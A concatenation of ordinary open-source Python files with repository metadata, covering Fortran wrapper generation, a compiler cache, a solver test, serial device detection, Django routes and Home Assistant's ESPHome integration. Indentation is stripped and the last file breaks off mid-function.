for m in list(use.keys()):
ret = '%s%suse %s,' % (ret, tab, m)
if use[m] == {}:
if ret and ret[-1] == ',':
ret = ret[:-1]
continue
if 'only' in use[m] and use[m]['only']:
ret = '%s only:' % (ret)
if 'map' in use[m] and use[m]['map']:
c = ' '
for k in list(use[m]['map'].keys()):
if k == use[m]['map'][k]:
ret = '%s%s%s' % (ret, c, k)
c = ','
else:
ret = '%s%s%s=>%s' % (ret, c, k, use[m]['map'][k])
c = ','
if ret and ret[-1] == ',':
ret = ret[:-1]
return ret
def true_intent_list(var):
lst = var['intent']
ret = []
for intent in lst:
try:
c = eval('isintent_%s(var)' % intent)
except NameError:
c = 0
if c:
ret.append(intent)
return ret
def vars2fortran(block, vars, args, tab='', as_interface=False):
"""
TODO:
public sub
...
"""
setmesstext(block)
ret = ''
nout = []
for a in args:
if a in block['vars']:
nout.append(a)
if 'commonvars' in block:
for a in block['commonvars']:
if a in vars:
if a not in nout:
nout.append(a)
else:
errmess(
'vars2fortran: Confused?!: "%s" is not defined in vars.\n' % a)
if 'varnames' in block:
nout.extend(block['varnames'])
if not as_interface:
for a in list(vars.keys()):
if a not in nout:
nout.append(a)
for a in nout:
if 'depend' in vars[a]:
for d in vars[a]['depend']:
if d in vars and 'depend' in vars[d] and a in vars[d]['depend']:
errmess(
'vars2fortran: Warning: cross-dependence between variables "%s" and "%s"\n' % (a, d))
if 'externals' in block and a in block['externals']:
if isintent_callback(vars[a]):
ret = '%s%sintent(callback) %s' % (ret, tab, a)
ret = '%s%sexternal %s' % (ret, tab, a)
if isoptional(vars[a]):
ret = '%s%soptional %s' % (ret, tab, a)
if a in vars and 'typespec' not in vars[a]:
continue
cont = 1
for b in block['body']:
if a == b['name'] and b['block'] == 'function':
cont = 0
break
if cont:
continue
if a not in vars:
show(vars)
outmess('vars2fortran: No definition for argument "%s".\n' % a)
continue
if a == block['name'] and not block['block'] == 'function':
continue
if 'typespec' not in vars[a]:
if 'attrspec' in vars[a] and 'external' in vars[a]['attrspec']:
if a in args:
ret = '%s%sexternal %s' % (ret, tab, a)
continue
show(vars[a])
outmess('vars2fortran: No typespec for argument "%s".\n' % a)
continue
vardef = vars[a]['typespec']
if vardef == 'type' and 'typename' in vars[a]:
vardef = '%s(%s)' % (vardef, vars[a]['typename'])
selector = {}
if 'kindselector' in vars[a]:
selector = vars[a]['kindselector']
elif 'charselector' in vars[a]:
selector = vars[a]['charselector']
if '*' in selector:
if selector['*'] in ['*', ':']:
vardef = '%s*(%s)' % (vardef, selector['*'])
else:
vardef = '%s*%s' % (vardef, selector['*'])
else:
if 'len' in selector:
vardef = '%s(len=%s' % (vardef, selector['len'])
if 'kind' in selector:
vardef = '%s,kind=%s)' % (vardef, selector['kind'])
else:
vardef = '%s)' % (vardef)
elif 'kind' in selector:
vardef = '%s(kind=%s)' % (vardef, selector['kind'])
c = ' '
if 'attrspec' in vars[a]:
attr = []
for l in vars[a]['attrspec']:
if l not in ['external']:
attr.append(l)
if attr:
vardef = '%s, %s' % (vardef, ','.join(attr))
c = ','
if 'dimension' in vars[a]:
vardef = '%s%sdimension(%s)' % (
vardef, c, ','.join(vars[a]['dimension']))
c = ','
if 'intent' in vars[a]:
lst = true_intent_list(vars[a])
if lst:
vardef = '%s%sintent(%s)' % (vardef, c, ','.join(lst))
c = ','
if 'check' in vars[a]:
vardef = '%s%scheck(%s)' % (vardef, c, ','.join(vars[a]['check']))
c = ','
if 'depend' in vars[a]:
vardef = '%s%sdepend(%s)' % (
vardef, c, ','.join(vars[a]['depend']))
c = ','
if '=' in vars[a]:
v = vars[a]['=']
if vars[a]['typespec'] in ['complex', 'double complex']:
try:
v = eval(v)
v = '(%s,%s)' % (v.real, v.imag)
except:
pass
vardef = '%s :: %s=%s' % (vardef, a, v)
else:
vardef = '%s :: %s' % (vardef, a)
ret = '%s%s%s' % (ret, tab, vardef)
return ret
######
def crackfortran(files):
global usermodules
outmess('Reading fortran codes...\n', 0)
readfortrancode(files, crackline)
outmess('Post-processing...\n', 0)
usermodules = []
postlist = postcrack(grouplist[0])
outmess('Post-processing (stage 2)...\n', 0)
postlist = postcrack2(postlist)
return usermodules + postlist
def crack2fortran(block):
global f2py_version
pyf = crack2fortrangen(block) + '\n'
header = """! -*- f90 -*-
! Note: the context of this file is case sensitive.
"""
footer = """
! This file was auto-generated with f2py (version:%s).
! See http://cens.ioc.ee/projects/f2py2e/
""" % (f2py_version)
return header + pyf + footer
if __name__ == "__main__":
files = []
funcs = []
f = 1
f2 = 0
f3 = 0
showblocklist = 0
for l in sys.argv[1:]:
if l == '':
pass
elif l[0] == ':':
f = 0
elif l == '-quiet':
quiet = 1
verbose = 0
elif l == '-verbose':
verbose = 2
quiet = 0
elif l == '-fix':
if strictf77:
outmess(
'Use option -f90 before -fix if Fortran 90 code is in fix form.\n', 0)
skipemptyends = 1
sourcecodeform = 'fix'
elif l == '-skipemptyends':
skipemptyends = 1
elif l == '--ignore-contains':
ignorecontains = 1
elif l == '-f77':
strictf77 = 1
sourcecodeform = 'fix'
elif l == '-f90':
strictf77 = 0
sourcecodeform = 'free'
skipemptyends = 1
elif l == '-h':
f2 = 1
elif l == '-show':
showblocklist = 1
elif l == '-m':
f3 = 1
elif l[0] == '-':
errmess('Unknown option %s\n' % repr(l))
elif f2:
f2 = 0
pyffilename = l
elif f3:
f3 = 0
f77modulename = l
elif f:
try:
open(l).close()
files.append(l)
except IOError as detail:
errmess('IOError: %s\n' % str(detail))
else:
funcs.append(l)
if not strictf77 and f77modulename and not skipemptyends:
outmess("""\
Warning: You have specifyied module name for non Fortran 77 code
that should not need one (expect if you are scanning F90 code
for non module blocks but then you should use flag -skipemptyends
and also be sure that the files do not contain programs without program statement).
""", 0)
postlist = crackfortran(files, funcs)
if pyffilename:
outmess('Writing fortran code to file %s\n' % repr(pyffilename), 0)
pyf = crack2fortran(postlist)
f = open(pyffilename, 'w')
f.write(pyf)
f.close()
if showblocklist:
show(postlist)
|
kiwifb/numpy
|
numpy/f2py/crackfortran.py
|
Python
|
bsd-3-clause
| 126,846
|
import os
import tempfile
import hashlib
import pickle
from collections import defaultdict
class CompilerRepository:
def __init__(self):
self.__dir = os.path.join(tempfile.gettempdir(), 'BuildPal', 'Compilers')
self.__compilers = set()
self.__partial_compilers = set()
self.__waiters = defaultdict(list)
self.__id_cache = {}
def __unique_id(self, compiler_id):
result = self.__id_cache.get(compiler_id)
if result is None:
result = hashlib.md5(pickle.dumps(compiler_id)).hexdigest()
self.__id_cache[compiler_id] = result
return result
def compiler_dir(self, compiler_id):
return os.path.join(self.__dir, self.__unique_id(compiler_id))
def compiler_required(self, compiler_id):
id = self.__unique_id(compiler_id)
if id in self.__compilers:
assert os.path.exists(self.compiler_dir(compiler_id))
return False
if os.path.exists(self.compiler_dir(compiler_id)):
self.__compilers.add(id)
return False
if id in self.__partial_compilers:
return False
self.__partial_compilers.add(id)
return True
def when_compiler_is_ready(self, compiler_id, handler):
id = self.__unique_id(compiler_id)
assert id in self.__compilers or id in self.__partial_compilers
if id in self.__compilers:
handler()
else:
self.__waiters[id].append(handler)
def set_compiler_ready(self, compiler_id):
id = self.__unique_id(compiler_id)
assert id in self.__partial_compilers
assert id not in self.__compilers
assert os.path.exists(self.compiler_dir(compiler_id))
self.__partial_compilers.remove(id)
self.__compilers.add(id)
for handler in self.__waiters[id]:
handler()
del self.__waiters[id]
|
pkesist/buildpal
|
Python/buildpal/server/compiler_repository.py
|
Python
|
gpl-3.0
| 1,976
|
from authenticate import authenticate
class backup(object):
def __init__(self, auth, hostname, port=4712, https=True):
self.auth = auth
self.hostname = hostname
self.port = port
self.https = https
def performBackup(self):
r = self.auth.get(self.backupURL())
return r.text
def backupURL(self):
a = authenticate(hostname=self.hostname, port=self.port, https=self.https)
return a.createAppendURL(string='backup')
|
ColinKeigher/McAfeeWebGateway
|
mwg/backup.py
|
Python
|
gpl-2.0
| 503
|
# Copyright 2017,2018,2019,2020,2021 Sony Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import nnabla.solvers as S
import numpy as np
from solver_test_utils import solver_tester, RefSolver
from nbla_test_utils import list_context
ctxs = list_context('Adam')
class RefAdam(RefSolver):
def __init__(self, alpha, beta1, beta2, eps):
self.alpha = alpha
self.beta1 = beta1
self.beta2 = beta2
self.eps = eps
self.m = {}
self.v = {}
self.t = {}
def _set_state_impl(self, key, param):
self.m[key] = np.zeros_like(param)
self.v[key] = np.zeros_like(param)
self.t[key] = 0
def _update_impl(self, key, p, g):
self.t[key] = min(self.t[key] + 1, np.iinfo(np.int32).max)
_update_adam(p, g, self.m[key], self.v[key], self.t[key],
self.alpha, self.beta1, self.beta2, self.eps)
def _update_adam(p, g, m, v, t, alpha, beta1, beta2, eps):
alpha_t = alpha * \
np.sqrt(1. - beta2 ** t) / (1. - beta1 ** t)
m[...] = beta1 * m + (1 - beta1) * g
v[...] = beta2 * v + (1 - beta2) * g * g
p[...] = p - alpha_t * m / (np.sqrt(v) + eps)
@pytest.mark.parametrize("ctx, solver_name", ctxs)
@pytest.mark.parametrize("decay", [1e-4])
@pytest.mark.parametrize("alpha", [1e-2, 1e-4])
@pytest.mark.parametrize("beta1, beta2", [(0.9, 0.999), (0.999, 0.9)])
@pytest.mark.parametrize("eps", [1e-8])
@pytest.mark.parametrize("seed", [313])
def test_adam(seed, alpha, beta1, beta2, eps, decay, ctx, solver_name):
rng = np.random.RandomState(seed)
solver_tester(
rng, S.Adam, RefAdam, [alpha, beta1, beta2, eps], atol=1e-6,
ctx=ctx, solver_name=solver_name)
|
sony/nnabla
|
python/test/solver/test_adam.py
|
Python
|
apache-2.0
| 2,232
|
from dogapi.stats.dog_stats_api import DogStatsApi
|
GbalsaC/bitnamiP
|
venv/lib/python2.7/site-packages/dogapi/stats/__init__.py
|
Python
|
agpl-3.0
| 51
|
import serial.tools.list_ports
import fermentrack_django.settings
import os
import pickle
# from . import udev_integration
DEVICE_CACHE_FILENAME = fermentrack_django.settings.ROOT_DIR / 'device.cache'
known_devices = {
'arduino': [
# Those with 'generic': False are virtually guaranteed to be Arduinos
{'vid': 0x2341, 'pid': 0x0010, 'name': "Arduino Mega2560", 'generic': False},
{'vid': 0x2341, 'pid': 0x8036, 'name': "Arduino Leonardo", 'generic': False},
{'vid': 0x2341, 'pid': 0x0036, 'name': "Arduino Leonardo Bootloader", 'generic': False},
{'vid': 0x2341, 'pid': 0x0043, 'name': "Arduino Uno", 'generic': False},
{'vid': 0x2341, 'pid': 0x0001, 'name': "Arduino Uno", 'generic': False},
{'vid': 0x2a03, 'pid': 0x0010, 'name': "Arduino Mega2560", 'generic': False},
{'vid': 0x2a03, 'pid': 0x8036, 'name': "Arduino Leonardo", 'generic': False},
{'vid': 0x2a03, 'pid': 0x0036, 'name': "Arduino Leonardo Bootloader", 'generic': False},
{'vid': 0x2a03, 'pid': 0x0043, 'name': "Arduino Uno", 'generic': False},
{'vid': 0x2a03, 'pid': 0x0001, 'name': "Arduino Uno", 'generic': False},
# While those with 'generic': True use a generic USB to UART bridge
{'vid': 0x1a86, 'pid': 0x7523, 'name': "Generic USB-Serial Chip", 'generic': True},
{'vid': 0x1D50, 'pid': 0x607D, 'name': "Generic CP2104 USB-Serial Chip", 'generic': True}, # Not sure if this is used on any Arduino clones
],
'particle': [
{'vid': 0x1D50, 'pid': 0x607D, 'name': "Particle Core", 'generic': True}, # Particle Core uses a generic CP2104 SLAB USBtoUART Chip
{'vid': 0x2B04, 'pid': 0xC006, 'name': "Particle Photon", 'generic': False},
{'vid': 0x2B04, 'pid': 0xC006, 'name': "Particle Photon", 'generic': False},
],
'esp8266': [
{'vid': 0x1D50, 'pid': 0x607D, 'name': "Generic CP2104 USB-Serial Chip", 'generic': True},
],
'esp32': [
{'vid': 0x1D50, 'pid': 0x607D, 'name': "Generic CP2104 USB-Serial Chip", 'generic': True},
]
}
def check_known_devices(family, pid, vid, return_bool=False):
unknown_device = {'name': "Unknown", 'generic': True}
if family not in known_devices:
if return_bool:
return False
else:
return unknown_device
device_list = known_devices[family]
for this_device in device_list:
if this_device['vid'] == vid and this_device['pid'] == pid:
if return_bool:
return True
else:
return {'name': this_device['name'], 'generic': this_device['generic']}
if return_bool:
return False
else:
return unknown_device
def write_list_to_file(devices, filename):
with open(filename, 'wb') as fp:
pickle.dump(devices, fp)
def read_list_from_file(filename):
with open(filename, 'rb') as fp:
devices = pickle.load(fp)
return devices
def cache_current_devices():
ports = list(serial.tools.list_ports.comports())
current_devices=[]
for p in ports:
current_devices.append(p.device)
write_list_to_file(current_devices, DEVICE_CACHE_FILENAME)
return current_devices
def compare_current_devices_against_cache(family="arduino"):
ports = list(serial.tools.list_ports.comports())
# We read current_devices the same as above
current_devices=[]
for p in ports:
current_devices.append(p.device)
# We read in existing_devices from the device.cache file we (presumably) created earlier
existing_devices = read_list_from_file(DEVICE_CACHE_FILENAME)
# New devices is any device that shows now (but didn't show before)
new_devices = list(set(current_devices) - set(existing_devices))
# Once we have current_devices, existing_devices, and new_devices, let's enrich new_devices
new_devices_enriched = []
for p in ports:
if p.device in new_devices:
known_device = check_known_devices(family, p.pid, p.vid)
enriched_device = {'vid': p.vid, 'pid': p.pid, 'device': p.device, 'description': p.description,
'known_name': known_device['name'], 'known_generic': known_device['generic']}
new_devices_enriched.append(enriched_device)
# And now, let's return all four lists for good measure. We can discard the ones we don't want.
return existing_devices, current_devices, new_devices, new_devices_enriched
# The following was used for testing during development
if __name__ == "__main__":
# cache_current_devices()
existing_devices, current_devices, new_devices, new_devices_enriched = compare_current_devices_against_cache("arduino")
pass
|
thorrak/fermentrack
|
app/serial_integration.py
|
Python
|
mit
| 4,779
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'news/$', views.post_list, name='postlist'),
url(r'submit/$', views.submit_post, name='submitpost'),
url(r'news/(?P<post_slug>[-\w]+)/$', views.post_view, name='postview'),
url(r'news/(?P<post_slug>[-\w]+)/(?P<comment_pk>\d+)$', views.comment_perma, name='commentperma'),
url(r'commentreply/(?P<comment_pk>\d+)/$', views.comment_reply, name='commentreply'),
url(r'ajax/postvote/$', views.post_vote, name='postvote'),
url(r'ajax/commentvote/$', views.comment_vote, name='commentvote'),
]
|
Jaxkr/TruthBot.org
|
Truthbot/news/urls.py
|
Python
|
gpl-2.0
| 591
|
"""Support for esphome devices."""
import asyncio
import logging
import math
from typing import Any, Callable, Dict, List, Optional
from aioesphomeapi import (
APIClient,
APIConnectionError,
DeviceInfo,
EntityInfo,
EntityState,
HomeassistantServiceCall,
UserService,
UserServiceArgType,
)
import voluptuous as vol
from homeassistant import const
from homeassistant.components import zeroconf
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
CONF_HOST,
CONF_PASSWORD,
CONF_PORT,
EVENT_HOMEASSISTANT_STOP,
)
from homeassistant.core import Event, State, callback
from homeassistant.exceptions import TemplateError
from homeassistant.helpers import template
import homeassistant.helpers.config_validation as cv
import homeassistant.helpers.device_registry as dr
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.event import async_track_state_change_event
from homeassistant.helpers.json import JSONEncoder
from homeassistant.helpers.storage import Store
from homeassistant.helpers.template import Template
from homeassistant.helpers.typing import ConfigType, HomeAssistantType
# Import config flow so that it's added to the registry
from .config_flow import EsphomeFlowHandler # noqa: F401
from .entry_data import DATA_KEY, RuntimeEntryData
DOMAIN = "esphome"
_LOGGER = logging.getLogger(__name__)
STORAGE_VERSION = 1
# No config schema - only configuration entry
CONFIG_SCHEMA = vol.Schema({}, extra=vol.ALLOW_EXTRA)
async def async_setup(hass: HomeAssistantType, config: ConfigType) -> bool:
"""Stub to allow setting up this component.
Configuration through YAML is not supported at this time.
"""
return True
async def async_setup_entry(hass: HomeAssistantType, entry: ConfigEntry) -> bool:
"""Set up the esphome component."""
hass.data.setdefault(DATA_KEY, {})
host = entry.data[CONF_HOST]
port = entry.data[CONF_PORT]
password = entry.data[CONF_PASSWORD]
device_id = None
zeroconf_instance = await zeroconf.async_get_instance(hass)
cli = APIClient(
hass.loop,
host,
port,
password,
client_info=f"Home Assistant {const.__version__}",
zeroconf_instance=zeroconf_instance,
)
# Store client in per-config-entry hass.data
store = Store(
hass, STORAGE_VERSION, f"esphome.{entry.entry_id}", encoder=JSONEncoder
)
entry_data = hass.data[DATA_KEY][entry.entry_id] = RuntimeEntryData(
client=cli, entry_id=entry.entry_id, store=store
)
async def on_stop(event: Event) -> None:
"""Cleanup the socket client on HA stop."""
await _cleanup_instance(hass, entry)
# Use async_listen instead of async_listen_once so that we don't deregister
# the callback twice when shutting down Home Assistant.
# "Unable to remove unknown listener <function EventBus.async_listen_once.<locals>.onetime_listener>"
entry_data.cleanup_callbacks.append(
hass.bus.async_listen(EVENT_HOMEASSISTANT_STOP, on_stop)
)
@callback
def async_on_state(state: EntityState) -> None:
"""Send dispatcher updates when a new state is received."""
entry_data.async_update_state(hass, state)
@callback
def async_on_service_call(service: HomeassistantServiceCall) -> None:
"""Call service when user automation in ESPHome config is triggered."""
domain, service_name = service.service.split(".", 1)
service_data = service.data
if service.data_template:
try:
data_template = {
key: Template(value) for key, value in service.data_template.items()
}
template.attach(hass, data_template)
service_data.update(
template.render_complex(data_template, service.variables)
)
except TemplateError as ex:
_LOGGER.error("Error rendering data template for %s: %s", host, ex)
return
if service.is_event:
# ESPHome uses servicecall packet for both events and service calls
# Ensure the user can only send events of form 'esphome.xyz'
if domain != "esphome":
_LOGGER.error(
"Can only generate events under esphome domain! (%s)", host
)
return
# Call native tag scan
if service_name == "tag_scanned":
tag_id = service_data["tag_id"]
hass.async_create_task(
hass.components.tag.async_scan_tag(tag_id, device_id)
)
return
hass.bus.async_fire(service.service, service_data)
else:
hass.async_create_task(
hass.services.async_call(
domain, service_name, service_data, blocking=True
)
)
async def send_home_assistant_state_event(event: Event) -> None:
"""Forward Home Assistant states updates to ESPHome."""
new_state = event.data.get("new_state")
if new_state is None:
return
entity_id = event.data.get("entity_id")
await cli.send_home_assistant_state(entity_id, new_state.state)
async def _send_home_assistant_state(
entity_id: str, new_state: Optional[State]
) -> None:
"""Forward Home Assistant states to ESPHome."""
await cli.send_home_assistant_state(entity_id, new_state.state)
@callback
def async_on_state_subscription(entity_id: str) -> None:
"""Subscribe and forward states for requested entities."""
unsub = async_track_state_change_event(
hass, [entity_id], send_home_assistant_state_event
)
entry_data.disconnect_callbacks.append(unsub)
new_state = hass.states.get(entity_id)
if new_state is None:
return
# Send initial state
hass.async_create_task(_send_home_assistant_state(entity_id, new_state))
async def on_login() -> None:
"""Subscribe to states and list entities on successful API login."""
nonlocal device_id
try:
entry_data.device_info = await cli.device_info()
entry_data.available = True
device_id = await _async_setup_device_registry(
hass, entry, entry_data.device_info
)
entry_data.async_update_device_state(hass)
entity_infos, services = await cli.list_entities_services()
await entry_data.async_update_static_infos(hass, entry, entity_infos)
await _setup_services(hass, entry_data, services)
await cli.subscribe_states(async_on_state)
await cli.subscribe_service_calls(async_on_service_call)
await cli.subscribe_home_assistant_states(async_on_state_subscription)
hass.async_create_task(entry_data.async_save_to_store())
except APIConnectionError as err:
_LOGGER.warning("Error getting initial data for %s: %s", host, err)
# Re-connection logic will trigger after this
await cli.disconnect()
try_connect = await _setup_auto_reconnect_logic(hass, cli, entry, host, on_login)
async def complete_setup() -> None:
"""Complete the config entry setup."""
infos, services = await entry_data.async_load_from_store()
await entry_data.async_update_static_infos(hass, entry, infos)
await _setup_services(hass, entry_data, services)
# Create connection attempt outside of HA's tracked task in order
# not to delay startup.
hass.loop.create_task(try_connect(is_disconnect=False))
hass.async_create_task(complete_setup())
return True
async def _setup_auto_reconnect_logic(
hass: HomeAssistantType, cli: APIClient, entry: ConfigEntry, host: str, on_login
):
"""Set up the re-connect logic for the API client."""
async def try_connect(tries: int = 0, is_disconnect: bool = True) -> None:
"""Try connecting to the API client. Will retry if not successful."""
if entry.entry_id not in hass.data[DOMAIN]:
# When removing/disconnecting manually
return
data: RuntimeEntryData = hass.data[DOMAIN][entry.entry_id]
for disconnect_cb in data.disconnect_callbacks:
disconnect_cb()
data.disconnect_callbacks = []
data.available = False
data.async_update_device_state(hass)
if is_disconnect:
# This can happen often depending on WiFi signal strength.
# So therefore all these connection warnings are logged
# as infos. The "unavailable" logic will still trigger so the
# user knows if the device is not connected.
_LOGGER.info("Disconnected from ESPHome API for %s", host)
if tries != 0:
# If not first re-try, wait and print message
# Cap wait time at 1 minute. This is because while working on the
# device (e.g. soldering stuff), users don't want to have to wait
# a long time for their device to show up in HA again (this was
# mentioned a lot in early feedback)
#
# In the future another API will be set up so that the ESP can
# notify HA of connectivity directly, but for new we'll use a
# really short reconnect interval.
tries = min(tries, 10) # prevent OverflowError
wait_time = int(round(min(1.8 ** tries, 60.0)))
_LOGGER.info("Trying to reconnect to %s in %s seconds", host, wait_time)
await asyncio.sleep(wait_time)
try:
await cli.connect(on_stop=try_connect, login=True)
except APIConnectionError as error:
_LOGGER.info(
"Can't connect to ESPHome API for %s (%s): %s",
entry.unique_id,
host,
error,
)
# Schedule re-connect in event loop in order not to delay HA
# startup. First connect is scheduled in tracked tasks.
data.reconnect_task = hass.loop.create_task(
try_connect(tries + 1, is_disconnect=False)
)
else:
_LOGGER.info("Successfully connected to %s", host)
hass.async_create_task(on_login())
return try_connect
async def _async_setup_device_registry(
hass: HomeAssistantType, entry: ConfigEntry, device_info: DeviceInfo
):
"""Set up device registry feature for a particular config entry."""
sw_version = device_info.esphome_version
if device_info.compilation_time:
sw_version += f" ({device_info.compilation_time})"
device_registry = await dr.async_get_registry(hass)
entry = device_registry.async_get_or_create(
config_entry_id=entry.entry_id,
connections={(dr.CONNECTION_NETWORK_MAC, device_info.mac_address)},
name=device_info.name,
manufacturer="espressif",
model=device_info.model,
sw_version=sw_version,
)
return entry.id
async def _register_service(
hass: HomeAssistantType, entry_data: RuntimeEntryData, service: UserService
):
service_name = f"{entry_data.device_info.name}_{service.name}"
schema = {}
for arg in service.args:
schema[vol.Required(arg.name)] = {
UserServiceArgType.BOOL: cv.boolean,
UserServiceArgType.INT: vol.Coerce(int),
UserServiceArgType.FLOAT: vol.Coerce(float),
UserServiceArgType.STRING: cv.string,
UserServiceArgType.BOOL_ARRAY: [cv.boolean],
UserServiceArgType.INT_ARRAY: [vol.Coerce(int)],
UserServiceArgType.FLOAT_ARRAY: [vol.Coerce(float)],
UserServiceArgType.STRING_ARRAY: [cv.string],
}[arg.type_]
async def execute_service(call):
await entry_data.client.execute_service(service, call.data)
hass.services.async_register(
DOMAIN, service_name, execute_service, vol.Schema(schema)
)
async def _setup_services(
hass: HomeAssistantType, entry_data: RuntimeEntryData, services: List[UserService]
):
old_services = entry_data.services.copy()
to_unregister = []
to_register = []
for service in services:
if service.key in old_services:
# Already exists
matching = old_services.pop(service.key)
if matching != service:
# Need to re-register
to_unregister.append(matching)
to_register.append(service)
else:
# New service
to_register.append(service)
for service in old_services.values():
to_unregister.append(service)
entry_data.services = {serv.key: serv for serv in services}
for service in to_unregister:
service_name = f"{entry_data.device_info.name}_{service.name}"
hass.services.async_remove(DOMAIN, service_name)
for service in to_register:
await _register_service(hass, entry_data, service)
async def _cleanup_instance(
hass: HomeAssistantType, entry: ConfigEntry
) -> RuntimeEntryData:
"""Cleanup the esphome client if it exists."""
data: RuntimeEntryData = hass.data[DATA_KEY].pop(entry.entry_id)
if data.reconnect_task is not None:
data.reconnect_task.cancel()
for disconnect_cb in data.disconnect_callbacks:
disconnect_cb()
for cleanup_callback in data.cleanup_callbacks:
cleanup_callback()
await data.client.disconnect()
return data
async def async_unload_entry(hass: HomeAssistantType, entry: ConfigEntry) -> bool:
"""Unload an esphome config entry."""
entry_data = await _cleanup_instance(hass, entry)
tasks = []
for platform in entry_data.loaded_platforms:
tasks.append(hass.config_entries.async_forward_entry_unload(entry, platform))
if tasks:
await asyncio.wait(tasks)
return True
async def platform_async_setup_entry(
hass: HomeAssistantType,
entry: ConfigEntry,
async_add_entities,
*,
component_key: str,
info_type,
entity_type,
state_type,
) -> None:
"""Set up an esphome platform.
This method is in charge of receiving, distributing and storing
info and state updates.
"""
entry_data: RuntimeEntryData = hass.data[DOMAIN][entry.entry_id]
entry_data.info[component_key] = {}
entry_data.old_info[component_key] = {}
entry_data.state[component_key] = {}
@callback
def async_list_entities(infos: List[EntityInfo]):
"""Update entities of this platform when entities are listed."""
old_infos = entry_data.info[component_key]
new_infos = {}
add_entities = []
for info in infos:
if not isinstance(info, info_type):
# Filter out infos that don't belong to this platform.
continue
if info.key in old_infos:
# Update existing entity
old_infos.pop(info.key)
else:
# Create new entity
entity = entity_type(entry.entry_id, component_key, info.key)
add_entities.append(entity)
new_infos[info.key] = info
# Remove old entities
for info in old_infos.values():
entry_data.async_remove_entity(hass, component_key, info.key)
# First copy the now-old info into the backup object
entry_data.old_info[component_key] = entry_data.info[component_key]
# Then update the actual info
entry_data.info[component_key] = new_infos
# Add entities to Home Assistant
async_add_entities(add_entities)
signal = f"esphome_{entry.entry_id}_on_list"
entry_data.cleanup_callbacks.append(
async_dispatcher_connect(hass, signal, async_list_entities)
)
@callback
def async_entity_state(state: EntityState):
"""Notify the appropriate entity of an updated state."""
if not isinstance(state, state_type):
return
entry_data.state[component_key][state.key] = state
entry_data.async_update_entity(hass, component_key, state.key)
signal = f"esphome_{entry.entry_id}_on_state"
entry_data.cleanup_callbacks.append(
async_dispatcher_connect(hass, signal, async_entity_state)
)
def esphome_state_property(func):
"""Wrap a state property of an esphome entity.
This checks if the state object in the entity is set, and
prevents writing NAN values to the Home Assistant state machine.
"""
@property
def _wrapper(self):
if self._state is None:
return None
val = func(self)
if isinstance(val, float) and math.isnan(val):
# Home Assistant doesn't use NAN values in state machine
# (not JSON serializable)
return None
return val
return _wrapper
class EsphomeEnumMapper:
"""Helper class to convert between hass and esphome enum values."""
def __init__(self, func: Callable[[], Dict[int, str]]):
"""Construct a EsphomeEnumMapper."""
self._func = func
def from_esphome(self, value: int) -> str:
"""Convert from an esphome int representation to a hass string."""
return self._func()[value]
def from_hass(self, value: str) -> int:
"""Convert from a hass string to a esphome int representation."""
inverse = {v: k for k, v in self._func().items()}
return inverse[value]
def esphome_map_enum(func: Callable[[], Dict[int, str]]):
"""Map esphome int enum values to hass string constants.
This class has to be used as a decorator. This ensures the aioesphomeapi
import is only happening at runtime.
"""
return EsphomeEnumMapper(func)
class EsphomeBaseEntity(Entity):
"""Define a base esphome entity."""
def __init__(self, entry_id: str, component_key: str, key: int):
"""Initialize."""
self._entry_id = entry_id
self._component_key = component_key
self._key = key
async def async_added_to_hass(self) -> None:
"""Register callbacks."""
self.async_on_remove(
async_dispatcher_connect(
self.hass,
(
f"esphome_{self._entry_id}_remove_"
f"{self._component_key}_{self._key}"
),
self.async_remove,
)
)
self.async_on_remove(
async_dispatcher_connect(
self.hass,
f"esphome_{self._entry_id}_on_device_update",
self._on_device_update,
)
)
@callback
def _on_device_update(self) -> None:
"""Update the entity state when device info has changed."""
if self._entry_data.available:
# Don't update the HA state yet when the device comes online.
# Only update the HA state when the full state arrives
# through the next entity state packet.
return
self.async_write_ha_state()
@property
def _entry_data(self) -> RuntimeEntryData:
return self.hass.data[DATA_KEY][self._entry_id]
@property
def _static_info(self) -> EntityInfo:
# Check if value is in info database. Use a single lookup.
info = self._entry_data.info[self._component_key].get(self._key)
if info is not None:
return info
# This entity is in the removal project and has been removed from .info
# already, look in old_info
return self._entry_data.old_info[self._component_key].get(self._key)
@property
def _device_info(self) -> DeviceInfo:
return self._entry_data.device_info
@property
def _client(self) -> APIClient:
return self._entry_data.client
@property
def _state(self) -> Optional[EntityState]:
try:
return self._entry_data.state[self._component_key][self._key]
except KeyError:
return None
@property
def available(self) -> bool:
"""Return if the entity is available."""
device = self._device_info
if device.has_deep_sleep:
# During deep sleep the ESP will not be connectable (by design)
# For these cases, show it as available
return True
return self._entry_data.available
@property
def unique_id(self) -> Optional[str]:
"""Return a unique id identifying the entity."""
if not self._static_info.unique_id:
return None
return self._static_info.unique_id
@property
def device_info(self) -> Dict[str, Any]:
"""Return device registry information for this entity."""
return {
"connections": {(dr.CONNECTION_NETWORK_MAC, self._device_info.mac_address)}
}
@property
def name(self) -> str:
"""Return the name of the entity."""
return self._static_info.name
@property
def should_poll(self) -> bool:
"""Disable polling."""
return False
class EsphomeEntity(EsphomeBaseEntity):
"""Define a generic esphome entity."""
async def async_added_to_hass(self) -> None:
"""Register callbacks."""
await super().async_added_to_hass()
self.async_on_remove(
async_dispatcher_connect(
self.hass,
(
f"esphome_{self._entry_id}"
f"_update_{self._component_key}_{self._key}"
),
self.async_write_ha_state,
)
)
|
tboyce021/home-assistant
|
homeassistant/components/esphome/__init__.py
|
Python
|
apache-2.0
| 21,801
|
from django.template.loader_tags import BlockNode, ExtendsNode
from django.template import loader, Context, RequestContext, TextNode
from django.http import HttpResponse
def get_template(template):
if isinstance(template, (tuple, list)):
return loader.select_template(template)
return loader.get_template(template)
class BlockNotFound(Exception):
pass
def render_template_block(template, block, context):
"""
Renders a single block from a template. This template should have previously been rendered.
"""
return render_template_block_nodelist(template.nodelist, block, context)
def render_template_block_nodelist(nodelist, block, context):
for node in nodelist:
if isinstance(node, BlockNode) and node.name == block:
return node.render(context)
for key in ('nodelist', 'nodelist_true', 'nodelist_false'):
if hasattr(node, key):
try:
